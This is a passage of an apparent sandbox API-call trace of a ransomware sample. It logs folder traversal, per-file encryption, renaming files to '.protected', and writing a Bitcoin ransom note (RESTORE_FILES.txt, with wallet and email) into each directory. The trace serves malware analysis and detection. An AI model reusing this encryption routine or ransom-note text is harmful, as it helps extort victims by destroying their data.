lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0077.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.373] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0077.373] CloseHandle (hObject=0xb4) returned 1 [0077.373] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0077.373] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0077.374] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\RESTORE_FILES.txt") returned 45 [0077.374] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\java\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.374] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.374] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.375] lstrlenA (lpString="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") returned 684 [0077.375] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.375] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.375] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.375] CloseHandle (hObject=0xa4) returned 1 [0077.375] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.375] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0077.375] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\RESTORE_FILES.txt") returned 40 [0077.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0077.376] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.376] lstrlenA (lpString="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") returned 684 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.376] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.377] CloseHandle (hObject=0xac) returned 1 [0077.377] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0077.377] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates") returned 28 [0077.377] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0077.377] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0077.377] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates\\*") returned 30 [0077.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0077.377] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0077.377] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0077.377] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\RESTORE_FILES.txt") returned 36 [0077.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0077.380] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.380] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0077.381] lstrlenA (lpString="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") returned 684 [0077.381] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0077.381] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.381] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0077.381] CloseHandle (hObject=0xa0) returned 1 [0077.381] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Windows") returned -1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Program Files") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Program Files (x86)") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="$Recycle.bin") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="System Volume Information") returned -1 [0077.381] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0077.381] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0077.381] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0077.381] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0077.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0077.384] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.384] wnsprintfW (in: 
pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0077.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.384] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.384] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.384] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\." (normalized: "c:\\recovery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.384] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.384] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0077.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.384] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.384] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.384] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.384] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Program Files (x86)") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0077.385] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0077.385] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0077.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b910 [0077.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.385] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0077.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.385] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.385] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.385] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\." (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.385] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0077.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.385] 
StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.385] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.386] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.." (normalized: "c:\\recovery"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.386] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Windows") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Program Files") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Program Files (x86)") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="$Recycle.bin") returned 1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="System Volume Information") returned -1 [0077.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrIW (lpFirst="boot.sdi", lpSrch=".protected") returned 0x0 [0077.386] lstrcmpW (lpString1="boot.sdi", lpString2="RESTORE_FILES.txt") returned -1 [0077.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.386] CreateFileW 
(lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".txt") returned 0x0 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".rar") returned 0x0 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".zip") returned 0x0 [0077.386] ReadFile (in: hFile=0xa4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.401] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.401] WriteFile (in: hFile=0xa4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.402] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.402] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0077.404] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0077.405] CloseHandle (hObject=0xa4) returned 1 [0077.405] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected") returned 71 [0077.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.protected")) returned 1 [0077.406] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Windows") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Program Files") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="Program Files (x86)") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="$Recycle.bin") returned 1 [0077.406] lstrcmpiW (lpString1="Winre.wim", lpString2="System Volume Information") returned 1 [0077.406] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.406] StrStrIW (lpFirst="Winre.wim", lpSrch=".protected") returned 0x0 [0077.406] lstrcmpW (lpString1="Winre.wim", lpString2="RESTORE_FILES.txt") returned 1 [0077.406] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.406] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.406] CreateFileW 
(lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".txt") returned 0x0 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".rar") returned 0x0 [0077.407] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0077.407] StrStrW (lpFirst="Winre.wim", lpSrch=".zip") returned 0x0 [0077.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.419] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.419] WriteFile (in: hFile=0xa4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.420] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.420] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0077.445] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, 